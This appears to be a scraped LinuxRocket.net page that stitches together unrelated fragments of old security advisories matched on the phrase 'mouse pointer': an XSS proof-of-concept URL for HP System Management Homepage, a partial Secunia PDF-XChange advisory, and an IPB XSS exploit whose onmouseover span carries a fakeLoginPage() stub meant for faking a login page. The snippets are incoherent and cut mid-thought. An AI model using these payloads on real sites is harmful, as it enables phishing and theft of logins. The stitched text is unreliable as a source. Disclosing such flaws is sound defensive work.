New User, Welcome!     Login

mouse pointer

PR10-11: Multiple XSS injection vulnerabilities and a offsite redirection flaw within HP System Management Homepage (Insight Manager)

Hardware Proliant DL380 G5, DL360 G5, DL380 G4

1) Basic reflective XSS attack (Windows only).

Proof of concept (move mouse pointer over search input box):

https://target-domain.foo:2381/hpdiags/frontend2/help/search.php?query="onmouseover="alert(1);

References: HP Customer Notice: HPSBMA02615 SSRT100228 rev.1 CVE-2010-4111

Secunia Research: PDF-XChange Viewer Content Parsing Memory Corruption Vulnerability

views a malicious PDF document.

NOTE: The vulnerable code is e.g. also present in the bundled 
PDF-XChange shell extension (XCShInfo.dll), which is installed by 
default. This vector allows exploitation as soon as a user e.g. 
selects a malicious PDF file or hovers the mouse pointer over it.

====================================================================== 
5) Solution 

Update to version 2.044.

IPB v2.x up to 3.0.4 XSS vulnerability

[+] Exploit

        --------------------------------->8---------------------------------
        <span onmouseover="javascript:alert('XSS');function
fakeLoginPage(){...}">move your mouse pointer here</span>
        ---------------------------------8<---------------------------------

        fakeLoginPage() function can be used to rewrite the whole page,
faking a login page through an embedded iframe.


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!